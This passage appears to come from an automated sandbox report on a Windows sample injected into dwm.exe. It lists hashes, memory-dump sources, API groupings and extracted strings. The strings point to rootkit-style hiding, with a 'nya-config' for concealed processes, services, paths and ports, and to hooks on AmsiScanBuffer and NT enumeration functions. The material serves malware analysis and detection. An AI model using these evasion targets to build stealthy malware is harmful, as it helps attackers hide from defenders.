                                                  • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                  • Instruction ID: ece9f4fb75c60a0ffb29cf2b96853b0ceff0fece9c3269e6bc48935afae10d06
                                                  • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                  • Instruction Fuzzy Hash: 27314179300E61C1FB529B67D56C36923B5EB44FC4F8854319E0A87FD6EE26C8588316

                                                  Control-flow Graph

                                                  • Executed / not-executed block colouring of the rendered graph is not preserved here.
                                                  • Single block 262f1caf370-262f1caf39f: VirtualProtect.
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                  • Instruction ID: f2e922bfa1bbf5c3a7d3d203004e5cb1834a0676a9aecda2eaacdf51f705b8f8
                                                  • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                  • Instruction Fuzzy Hash: E5D0C935731950C3E300DB12E8497966238B398701FC04015E94982A948B7DC659CB51

                                                  Control-flow Graph
                                                  control_flow_graph 409 262f1d0f370-262f1d0f39f VirtualProtect
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                  • Instruction ID: f00f757df4a10957ec3c18d2ce7bea6e40a0d13cbce99772594dd902569dc966
                                                  • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                  • Instruction Fuzzy Hash: D7D0C9357319A0C3F304DB52D849B956278B398701FC04005E94992A948B7DC259CB50

                                                  Control-flow Graph
                                                  control_flow_graph 410 262f1d3f370-262f1d3f39f VirtualProtect
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448872342.00000262F1D31000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D30000, based on PE: true
                                                  • Associated: 00000012.00000002.3448816247.00000262F1D30000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448971011.00000262F1D45000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3449077595.00000262F1D50000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3449181058.00000262F1D52000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3449289748.00000262F1D59000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d30000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                  • Instruction ID: 43e1f4af8a9e6e3e10bd71d104b3159c7a2b8a9c3119750c479f742642c2db56
                                                  • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                  • Instruction Fuzzy Hash: 8DD0C935731960C3E3049B12D84A7966238B398701FC04005E94992A949B7DC259CB50
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                  • API String ID: 2119608203-3850299575
                                                  • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction ID: 69f3d3eaa3d6884608b45df35872c1e03a97c7c2da1dea68ca9ba8341c18b76f
                                                  • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction Fuzzy Hash: 5AB17B72215AA0C2EB668F66D42D7A9A3B4F744F84F946026EE0993FD5DE36CC48C341
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                  • API String ID: 2119608203-3850299575
                                                  • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction ID: 9208176f5fd25b37848e597e8bf149f358517d6189f1a7bc1efe39fde8843191
                                                  • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction Fuzzy Hash: C3B17E72210EA0EAEB698F66D54C7A9A3B4F744F84F945016EE0953F98DF36CD88C740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448872342.00000262F1D31000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D30000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d30000_dwm.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                  • API String ID: 2119608203-3850299575
                                                  • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction ID: e46fba9edd0b816e117b2557f57403e9d5e8241ef2745bd9b2dfa81438edb6b6
                                                  • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                  • Instruction Fuzzy Hash: FAB17D36210EA0E2EB688F66D64D7A9A3B4F744B84F849016EE4D57F94DF36CD88C740
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 3140674995-0
                                                  • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                  • Instruction ID: de3898a97a84e47f03e0277eae2282252cdc9e1c4227fc05dafa4fd36ecf113e
                                                  • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                  • Instruction Fuzzy Hash: EA313672205F90CAEB60CF61E8587EE6374F784748F84402ADA4E87BD9DF39C6488B11
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 3140674995-0
                                                  • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                  • Instruction ID: 3af119f925bd1c4d657a86cb189ef0273533cc4d83509680832d29b866cbf17a
                                                  • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                  • Instruction Fuzzy Hash: 63313972605F90C6FB608F61E8883EE6374F789744F84402ADA4E57B99DF79C648CB10
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 1239891234-0
                                                  • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                  • Instruction ID: 242f319d45f79e06df35416f8a483474c1987fa3c154e71153dec5f1e2001d11
                                                  • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                  • Instruction Fuzzy Hash: 59414836214F90C6EB61CB25E8583AA73B4F788754F900225EB8D86BD9DF39C559CB01
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 1239891234-0
                                                  • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                  • Instruction ID: cb444bd1594bb2f39c8282772ae346ffb350d46afaddabb2239a75e745ec8411
                                                  • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                  • Instruction Fuzzy Hash: 41416D36214F90C6EB60CF25E84839E73B4F789B94F900125EA9D57BA9DF39C559CB00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID:
                                                  • API String ID: 1164774033-0
                                                  • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction ID: f60f77df28b5db655b44b70f9761e20235b6923ef2c97fa86e7d3c2f494fdfca
                                                  • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction Fuzzy Hash: FDA13932704EA0C9FB22DB75A46C3BD6BB0E741B94F944135DE8927EE5CA3AC449C702
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID:
                                                  • API String ID: 1164774033-0
                                                  • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction ID: 5ec427f1e28192e5f670de6fda6fd69ee977d714a9bdbf4581e441d139128064
                                                  • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction Fuzzy Hash: F1A10632704FA0C9FB20DB75A48C3AE6BB0E785F94F944116DE9827E9DCA7AC049C704
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                  • String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                  • API String ID: 2135414181-3572789727
                                                  • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction ID: e403f0359fa1c4c32d5c259256a382749dc8a7b7df2545cfba0458969aaa7737
                                                  • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                                  • Instruction Fuzzy Hash: A071D776310E75C6FB10DFA5E89C69923B8FB89B88F801211DA4D57F68DE3AC548C740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                  • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                  • API String ID: 1735320900-4225371247
                                                  • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction ID: 37c37c4d0f6f8019c0686828f4b48498074dac16856741b909d659c60ed972ee
                                                  • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                  • Instruction Fuzzy Hash: 5851BE74101EAAE6FB04DFA8EC4D7D42B35B748B84FD04527940963D79DE3A869EC340
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                  • String ID: d
                                                  • API String ID: 2005889112-2564639436
                                                  • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                  • Instruction ID: 4d273957cce40b14b81512b212960d0c5ac69eb77c03bf3582a26a423fa22559
                                                  • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                  • Instruction Fuzzy Hash: E2515A32210B94DAE761CF62E85C39A77B1F788F99F844124DE4A47B98DF3DC0498B01
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                  • String ID: d
                                                  • API String ID: 2005889112-2564639436
                                                  • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                  • Instruction ID: 85af7c0df6d96ff56793c513c846f53bbe21566487b804fef60e96e1e86c56aa
                                                  • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                  • Instruction Fuzzy Hash: 1E511672210B98DAE725CF62E84C35AB7B5F789F98F844124DE4917B68EF3DC0498B00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                  • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                  • API String ID: 740688525-1880043860
                                                  • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction ID: 7a4b9934c39954434b1bed372665b8cad1b52a957d3a02baf700525a140d350d
                                                  • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                  • Instruction Fuzzy Hash: 40518B31705F64D2FA199B56A80C3A922B0AB49FB0FD807259E3D47BD8EF3AD4498740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Running Time
                                                  • API String ID: 1943346504-1805530042
                                                  • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                  • Instruction ID: 818ea9e5dd1d903799723881392a824daa059856c04b34a5f3159795b7fd6ab2
                                                  • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                  • Instruction Fuzzy Hash: DB31DF36A04E60D6E722CF52A81C399A7B0F788BC5F840534DE4983EE5DF39C45A8741
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Running Time
                                                  • API String ID: 1943346504-1805530042
                                                  • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                  • Instruction ID: e201dc5a76edf7af057087f8435fc5362f830a304ae305911e779908e8925d15
                                                  • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                  • Instruction Fuzzy Hash: 19319A36A00E64EAF721CF12A84C759A3B0F788F95FC54625DE4957E28EF3DC45A8740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                  • API String ID: 1943346504-3507739905
                                                  • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction ID: 2e2f9f89027a32d9da8d4dac6d4efbe50fd2faeaa6770bac27176f6d1014dbee
                                                  • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction Fuzzy Hash: E831BF31A10F65CAE751DF26A8AC75963F0B784F85F845034DE8A83BA4DF39C449CB01
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                  • API String ID: 1943346504-3507739905
                                                  • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction ID: 674d6d720af4566d9f90aa9011e063bbd8d2adb1117406ba20fd6cb004da0350
                                                  • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction Fuzzy Hash: 6B313931610F65DAFB50DF22A88C759B3B1F789F94F8441259E4A53B78EE3AD4498B00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                  • Instruction ID: 3011e366b99087b3ad4c97fa2f5798e4d10311efc7662d3079cbf8b784a87d51
                                                  • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                  • Instruction Fuzzy Hash: F2D18E32604FA0CAEB22DB65946D39D77B0F799B88F900125EA8957FD5CB35C489CB02
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000003.1494451949.00000262F1EB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000262F1EB0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_3_262f1eb0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                  • Instruction ID: 2e8a0e5b5e82ce01629f168f628000d8c7409aab03160c131e47597a4f9aa8e4
                                                  • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                  • Instruction Fuzzy Hash: 2CD17A72604BA0CAEB60DF65949C3AD77F0F785788F940215EE8957F9ADB3AC099C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmp
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
